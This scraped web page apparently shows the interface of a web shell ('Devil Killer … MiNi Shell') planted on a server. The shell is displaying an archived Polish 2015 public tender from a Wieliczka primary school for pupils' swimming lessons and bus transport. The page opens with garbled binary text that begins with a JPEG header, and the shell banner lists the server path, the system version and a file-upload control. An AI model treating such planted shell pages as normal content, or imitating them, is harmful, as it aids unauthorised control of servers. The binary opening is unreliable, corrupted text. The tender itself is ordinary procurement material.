JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151222/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151222/188053-N-2015.html

<p class="kh_header"><b>Wieliczka: Świadczenie usług polegających na zorganizowaniu i prowadzeniu zajęć na basenie (pływalni krytej), wraz z dowozem i odwozem, dla grup uczniów Szkoły Podstawowej nr 2 w Wieliczce w 2016 r.</b><br>
<b>Numer ogłoszenia: 188053 - 2015; data zamieszczenia: 22.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa Nr 2 im. Tadeusza Kościuszki , ul. Stanisława Moniuszki 1, 32-020 Wieliczka, woj. małopolskie, tel. 12 278 11 77, faks 12 278 11 77.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szkola2.wieliczka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Szkoła Podstawowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług polegających na zorganizowaniu i prowadzeniu zajęć na basenie (pływalni krytej), wraz z dowozem i odwozem, dla grup uczniów Szkoły Podstawowej nr 2 w Wieliczce w 2016 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Świadczenie usług polegających na zorganizowaniu i prowadzeniu zajęć nauki pływania na basenie (pływalni krytej), wraz z dowozem i odwozem w ramach zajęć lekcyjnych dla uczniów Szkoły Podstawowej nr 2 w Wieliczce.
Przedmiotem zamówienia jest w szczególności zakup biletów wstępu na basen publiczny który podlega nadzorowi instytucji ds. zdrowia, zgodnie z obowiązującym prawem i standardami, w szczególności rozporządzeniem Rady Ministrów z dnia 6 maja 1997 r. w sprawie określenia warunków bezpieczeństwa osób przebywających w górach, pływających, kąpiących się i uprawiających sporty wodne (Dz. U z dnia 7 czerwca 1997 r., Nr 57 poz. 358), wraz z usługą instruktorską i nauką pływania, oraz usługą dowozu i odwozu po zajęciach grup uczniów.
Wykonawca winien dysponować basenem (krytą pływalnią), który powinien znajdować się w odległości nie większej niż 10 km od siedziby Zamawiającego (odległość po drogach asfaltowych). Odległość ta będzie weryfikowana przez Zamawiającego w trakcie badania ofert na podstawie internetowej aplikacji wyznaczania trasy google maps.
CPV
92600000-7 Usługi sportowe
60130000-8 Usługi w zakresie specjalistycznego transportu drogowego osób
3.1. Nauka pływania na basenie - standardy usługi:  
1. Instruktorzy pływania w liczbie co najmniej 1 na 15 osób
2. Stały nadzór ratowników na basenie (min. 3 ratowników)
3. Sprzęt do nauki pływania
Makarony w ilości ok. 60 sztuk 
Rękawki w ilości ok. 30 sztuk w różnych wielkościach
Deski w ilości ok. 60 sztuk
Sprzęt do zajęć adaptacyjnych w wodzie dzieci
4. Liczba osób przebywających równocześnie na basenie do 75 uczniów,
5. Dwie szatnie damska i męska z przebieralniami oraz szatnia dla niepełnosprawnych, min. 16 suszarek stacjonarnych
6. Zaplecze: basen sportowy o głb. do ok.1, 80 m, basen rekreacyjny o głb. do ok. 1,20 m,
7. Zapewnienie dowozu na zajęcia według trasy szkoła - basen - szkoła, na  45 minut przed zajęciami, oraz odwóz  40 min. po zajęciach wg harmonogramu zajęć, przy czym Zamawiający wymaga aby czas samego dojazdu na basen i odwozu (transportu) dzieci nie przekraczał czasowo 20 minut w jedną stronę. Zamawiający zastrzega, że czas ten w indywidualnych przypadkach może ulec zmianie.
8. Zapewnienie wymaganych środków transportu;

3.2. Zamawiający planuje opracowanie szczegółowego harmonogramu zajęć na basenie po wyborze oferty najkorzystniejszej w uzgodnieniu Wykonawcą.
Usługą objętych będzie ok. 440 uczniów (tygodniowo), ilość tygodni 38 Zamawiający informuje, że ilość dzieci może ulec zmianie oraz ilość tygodni może ulec zmianie, na co wykonawca wyraża zgodę. Zajęcia odbywać się będą  w okresie od poniedziałku do piątku z wyłączeniem okresów przerw w nauce i dni wolnych. Rzeczywista ilość wykonywanych usług będzie uzależniona od faktycznych potrzeb Zamawiającego.
3.3. Przykładowa tematyka zajęć:
- zapoznanie się z obiektem, jego regulaminem, zasadami bezpieczeństwa i higieny,
- opanowanie podstawowych czynności ruchowych w środowisku wodnym,
- wyczuwanie sił wyporu wody tj. opanowanie leżenia na piersiach i grzbiecie,
- pływanie elementarne,
- doskonalenie wyuczonych elementów pływania.

3.4. Świadczona usługa transportowa polegać będzie na dowozie zorganizowanych grup uczniów wraz z opiekunami (max 75 osób) z siedziby Zamawiającego na teren przy basenie (pływalni), oraz ich odwozie po zakończonych zajęciach na pływalni.

Wyznaczenie osób sprawujących opiekę nad przewożonymi uczniami pozostaje w wyłącznej kompetencji Zamawiającego. Zadaniem po stronie Wykonawcy pozostaje zapewnienie dobrej współpracy pomiędzy kierowcą danego pojazdu, a osobami sprawującymi opiekę.
Ilość uczniów korzystających z usługi może ulec zmianie w trakcie trwania roku kalendarzowego. 
Wykonawca może zapoznać się w terenie z trasami przewozu uczniów z siedziby Zamawiającego na teren basenu (pływalni).
UWAGA:
Planuje się ustalenie harmonogramu z Wykonawcą po wyborze najkorzystniejszej oferty. 
Zadaniem wykonawcy jest zapewnienie przewożonym uczniom bezpiecznych i higienicznych warunków przejazdu pojazdami sprawnymi technicznie i dopuszczonymi do ruchu kołowego, obsługiwanych przez pracowników o odpowiednich kwalifikacjach. Transport winien być wykonywany przez wykonawcę (osoby) posiadającego odpowiednie uprawnienia do wykonywania transportu zbiorowego osób po drogach publicznych. Zamawiający zastrzega sobie prawo do kontroli wykonawcy w tym zakresie w czasie realizacji zamówienia. 
Wymaga się, by Wykonawca posiadał lub miał dostęp (np. na zasadach wynajmu, leasingu itp.) co najmniej do następujących środków transportu:
- 2 autobusów z co najmniej 38 miejscami siedzącymi każdy (nie licząc miejsca kierowcy)
- 1 busa z co najmniej 19 miejscami siedzącymi (nie licząc miejsca kierowcy)
oraz aby dysponował co najmniej 3 kierowcami posiadającymi kwalifikacje wymagane prawem do kierowania w/w pojazdami w zakresie przewozu osób (2 kierowców posiadających kwalifikacje do kierowania autobusami min. na min. 38 miejsc siedzących oraz 1 kierowca posiadający kwalifikacje do kierowania busem z min. 19 miejscami siedzącymi).
Zamawiający oczekuje, że Wykonawca dobierze w sposób optymalny pojemności autobusów w stosunku do liczby uczniów dowożonych na zajęcia, gdyby zaistniały zmiany niemożliwe do przewidzenia na etapie sporządzania niniejszej specyfikacji.
Zadaniem Wykonawcy jest udzielenie gwarancji rozumianej jako konieczność bezwzględnego  zapewnienia ciągłości wykonywania usługi, tak więc:
a) w przypadku wystąpienia okoliczności uniemożliwiających Wykonawcy realizację usługi transportowej jest on zobowiązany na własny koszt i ryzyko zapewnić zastępcze wykonanie usługi przez innego koncesjonowanego przewoźnika, który spełnia podstawowe wymagania stawiane wykonawcy;
b) jeżeli Wykonawca nie dopełni obowiązków wskazanych w pkt a, zamawiający zleci zastępcze wykonanie usługi transportowej innemu Wykonawcy, a koszty tej usługi zostaną potrącone z wynagrodzenia Wykonawcy wskazanego na najbliższej fakturze;
c) zabrania się przewożenia osób trzecich nie związanych bezpośrednio z wykonywanym dowozem uczniów lub zajęciami na basenie..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 uPzp polegające na powtórzeniu tego samego rodzaju usług co zamówienie podstawowe do wysokości 50 % wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 92.60.00.00-7, 60.13.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia może ubiegać się Wykonawca, który udokumentuje wykonanie, a w przypadku świadczeń okresowych lub ciągłych również wykonywanie, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jednej usługi polegającej na zorganizowaniu i przeprowadzeniu zajęć lekcyjnych lub sportowych (w tym między innymi nauki pływania) na basenie dla co najmniej 100 osób tygodniowo przez okres co najmniej 24 tygodni.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia może ubiegać się Wykonawca który udokumentuje dysponowanie następującymi narzędziami, wyposażeniem zakładu, urządzeniami technicznymi:
- co najmniej 1 basenem (krytą pływalnią) który podlega nadzorowi instytucji ds. zdrowia, zgodnie z obowiązującym prawem i standardami, w szczególności rozporządzeniem Rady Ministrów z dnia 6 maja 1997 r. w sprawie określenia warunków bezpieczeństwa osób przebywających w górach, pływających, kąpiących się i uprawiających sporty wodne (Dz. U z dnia 7 czerwca 1997 r., Nr 57 poz. 358) położonym w odległości nie większej niż 10 km od siedziby Zamawiającego (odległość po drogach asfaltowych). Odległość ta będzie weryfikowana przez Zamawiającego w trakcie badania ofert na podstawie internetowej aplikacji wyznaczania trasy google maps.
- co najmniej 2 autobusami zarejestrowanymi do przewozu osób z minimalną ilością miejsc siedzących 38 każdy autobus (nie licząc miejsca kierowcy);
- co najmniej 1 busem zarejestrowanym do przewozu osób z minimalną ilością miejsc siedzących 19 (nie licząc miejsca kierowcy).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia może ubiegać się Wykonawca, który dysponuje:
- co najmniej 3 osobami posiadającymi uprawnienia ratownika wodnego;
- co najmniej 2 osobami posiadającymi uprawnienia do kierowania autobusem zarejestrowanym do przewozu co najmniej 38 osób;
- co najmniej 1 osobą  posiadającymi uprawnienia do kierowania busem zarejestrowanym do przewozu co najmniej 19 osób.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>O udzielenie zamówienia może ubiegać się Wykonawca, który udokumentuje wykonanie, a w przypadku świadczeń okresowych lub ciągłych również wykonywanie, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jednej usługi polegającej na zorganizowaniu i przeprowadzeniu zajęć lekcyjnych lub sportowych (w tym między innymi nauki pływania) na basenie dla co najmniej 100 osób tygodniowo przez okres co najmniej 24 tygodni.;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz oferty- sporządzony według formularza stanowiącego Zał. nr 1 do SIWZ. 
2. Wskazanie tej części zamówienia, której wykonanie wykonawca zamierza powierzyć podwykonawcy - sporządzone według formularza stanowiącego Zał. nr 6 do SIWZ. Niezłożenie załącznika nr 6 do oferty jest rozumiane przez Zamawiającego, że Wykonawca wykona zamówienie siłami własnymi i nie będzie powierzał podwykonawcy żadnej części zamówienia. 
3. Wypełniony formularz cenowy - sporządzony według formularza stanowiącego Zał. nr 7 do SIWZ. 
4. Jeżeli wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, zamawiający w celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, żąda przedstawienia dokumentów dotyczących w szczególności:
- zakresu dostępnych wykonawcy zasobów innego podmiotu,
- sposobu wykorzystania zasobów innego podmiotu, przez wykonawce przy wykonywaniu zamówienia,
- charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem,
- zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówieniami. Zamawiający wymaga, aby zobowiązanie innego podmiotu, o którym mowa w art. 26 ust.2b uPzp złożone zostało w formie pisemnej.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - TERMIN PŁATNOŚCI FAKTUR - 2</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość istotnych zmian postanowień zawartej umowy w stosunku do treści oferty w przypadku (art. 144 ust. 1 uPzp):
- zmian nazwy, siedziby lub innych danych Wykonawcy;
- udziału lub zmiany podwykonawców;
- zmniejszenie ilości zamówienia wynikające z faktu, iż realizacja tej części stała się dla  zamawiającego nieuzasadniona społecznie lub ekonomicznie;
- zmiany terminu wynikającej z przedłużających się procedur (np. związanych z zamówieniami publicznymi, pozyskiwaniem dodatkowych uzgodnień lub decyzji);
- zmiana wykonania ilości usług w przypadku zmiany ilości dzieci korzystających z basenu, zmiana ilości dni/tygodni korzystania z basenu, z - przyczyn niezależnych od zamawiającego 
- wszelkich zmian wynikających z konieczności dostosowania warunków już zawartej umowy do nowych uregulowań prawnych;
zmiany harmonogramu zajęć związanej ze zmianą podziału godzin, ilości dzieci, ilości tygodni.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szkola2.wieliczka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Zamówień Publicznych Urzędu Miasta i Gminy w Wieliczce, 32-020 Wieliczka, ul. Sienkiewicza 2 tel. (012) 263-43-31..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.12.2015 godzina 11:00, miejsce: Urząd Miasta i Gminy w Wieliczce, 32-020 Wieliczka, ul. Powstania Warszawskiego 1 - sekretariat Burmistrza.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. SIWZ wraz z załącznikami dostępna jest na stronie internetowej: www.szkola2.wieliczka.pl -> BIP -> Zamówienia publiczne. 

2. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne (tj. złożone w oryginale) zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia. 

3.  Jeżeli wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, zamawiający w celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, żąda przedstawienia dokumentów dotyczących w szczególności:
- zakresu dostępnych wykonawcy zasobów innego podmiotu,
- sposobu wykorzystania zasobów innego podmiotu, przez wykonawce przy wykonywaniu zamówienia,
- charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem,
- zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówieniami.
Zamawiający wymaga, aby zobowiązanie innego podmiotu, o którym mowa w art. 26 ust.2b uPzp złożone zostało w formie pisemnej. 

4. Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art. 26 ust.2b uPzp, odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy. 

5. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek określony w pkt. 5.1 SIWZ w zakresie art. 22 ust. 1 uPzp, może być spełniony łącznie przez tych Wykonawców, natomiast w zakresie art. 24 uPzp każdy z członków konsorcjum lub spółki cywilnej nie może podlegać wykluczeniu na jego podstawie. 

6. Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu na podstawie złożonych przez Wykonawcę dokumentów i oświadczeń wymaganych postanowieniami SIWZ przy zastosowaniu formuły: złożył dokumenty potwierdzające spełnianie warunków / nie złożył dokumentów potwierdzających spełnianie warunków. 

7. Dokumenty są składane w oryginale lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku innych podmiotów, na zasobach których Wykonawca polega na zasadach określonych w art. 26 ust. 2b ustawy, kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem odpowiednio przez wykonawcę lub te podmioty.

8. Dokumenty sporządzone w języku obcym Wykonawca składa wraz z tłumaczeniem na język polski.

9. W przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamawiający może się zwrócić do właściwych organów odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, z wnioskiem o udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu.

